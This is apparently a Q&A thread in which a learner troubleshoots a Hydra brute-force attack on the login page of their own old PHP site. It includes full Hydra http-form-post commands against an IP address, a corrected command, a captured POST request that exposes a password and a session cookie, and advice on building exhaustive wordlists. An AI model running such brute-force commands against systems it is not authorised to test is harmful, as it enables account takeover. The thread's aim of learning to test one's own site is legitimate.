# Using Hydra to try a brute force attack on my login page wont work

Tags: php, security, brute-force, hydra

I am just learning how to use Hydra for brute force attacks and am trying to test on a login page I have built for an old site. Some times I can get Hydra to run and attempt the attack but it never works even when I put in the correct password in my password.txt file. Why my code wouldn't be firing right?

Here are the things I think may be an issue but I cant seem to figure out whether they are or not.

- the login form post to itself to verify the credentials
- if the pw is wrong it out puts Oops, Wrong Username Or Password! (and I get issues if I use that entire string in my command)
- maybe im not rooting to the proper location for my attack

Note that the site is on sub directory of my site right now. Also the login uses just MD5 which I included both the password string and the MD5 version of the password in my password.txt file

Here is my command:

```
hydra 69.57.9.2 http-form-post "/john_smith_blog/admin_login/index.php:username=^USER^&password=^PASS^:Oops” -l JohnSmith -P password.txt -t 10 -w 30 -o hydra-http-post-attack.txt
```

Here is the Post data from wireshark

```
POST /john_smith/admin_login/index.php HTTP/1.1
Host: DomainNameDotCom
Connection: keep-alive
Content-Length: 359
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: DomainNameDotCom
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3vaAYMlCejOUFLH5
Referer: DomainNameDotCom/john_smith/admin_login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: __utmz=237398355.1442340459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=237398355.593524857.1442328243.1442340459.1445019147.2; __unam=7639673-14fd22d2da8-49c4842-202; PHPSESSID=npth83ho7cg7di5bps0qtlm1i7; _ga=GA1.2.593524857.1442328243

------WebKitFormBoundary3vaAYMlCejOUFLH5
Content-Disposition: form-data; name="username"

JohnSmith
------WebKitFormBoundary3vaAYMlCejOUFLH5
Content-Disposition: form-data; name="password"

JohnSmith94
------WebKitFormBoundary3vaAYMlCejOUFLH5
Content-Disposition: form-data; name="Submit"

Login
------WebKitFormBoundary3vaAYMlCejOUFLH5--
HTTP/1.1 200 OK
Date: Sun, 22 Nov 2015 23:07:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

49a
Oops, Wrong Username Or Password!
```

Answer (score 0):

Are you using THC or did you make your own Hydra Version?

THC

Try to update your hydra and if not try to download the latest and double check your options.

Own Hydra Version

On what PL are you using? Try making your password.txt files in an array form and have your codes try to use array by array sequence. And in my opinion, First make a complete bruteforce.txt from 'a' to 'zzzzzzzzzzz' like that.

It's best to make your own than use others' work. Just sayin :)

Comment: Thanks for the input! I am using THC currently, Im only a couple days into learning this kind of stuff so I dont fully know all the best ways of doing this yet lol

Comment: Just a friendly tip. If you're new to PL or anything related, it's best to use a third party software for educational purpose but if you can make your own version of it, i'd say go for it! Base on my experience on THC, I had a hard time using it. So why bother search it on the Internet? If I can make my own? Good Luck in the Future ^ _ ^

Answer (score 0):

Make sure that the form parameters are the same as in the hydra attack (e.g. username and password).

Also keep in mind that the query which you have is designed to work on POST request form. You may need to put more parameters there (e.g. Login=Login or something like that).

To check that it would be best if you install a simple browser plugin (e.g. tamper data or headers) which when made in listening mode will be able to present you with the full post data request. From there you can just can modify your hydra parameters.

Comment: Thanks for the advice! Ive made sure the credentials are the same as well, also the form post to itself there is no get method. I also use Wireshark to track all the data for the form to ensure I get all the information needed. When i use the code above I cant get any kind of response, it cant even make a command after, but if I use some like this  hydra -l JohnSmith -P password.txt ftp://69.57.9.2 http-from-post "/john_smith/admin_login/index.php:Oops” It alreast tries and say it gets no matches

Comment: Wireshark is great for the task. Would you mind to paste the POST data from a dummy login?

Comment: Just upadated the question to show what I get from wireshark about the post. I changed some things like the host to say DomainNameDotCom because stack overflow wouldnt let my enter the domain host

Comment: hydra 69.57.9.2 http-form-post "/john_smith_blog/admin_login/index.php:username=^USER^&password=^PASS^&Submit=Login:Oops” -l JohnSmith -P password.txt -t 10 -w 30 -o hydra-http-post-attack.txt You can see in the packet that there is one more parameter. Try like and let me know if doesn't work.

Comment: Thanks for picking that out, its still a big help. It still hasnt seemed to work. For whatever reason it only seems to run if i run the command twice(nothing happens on the first command) them it will try, but it takes a long time to finish and it never figures it out. There are only two passwords to check so it shouldnt take this long either.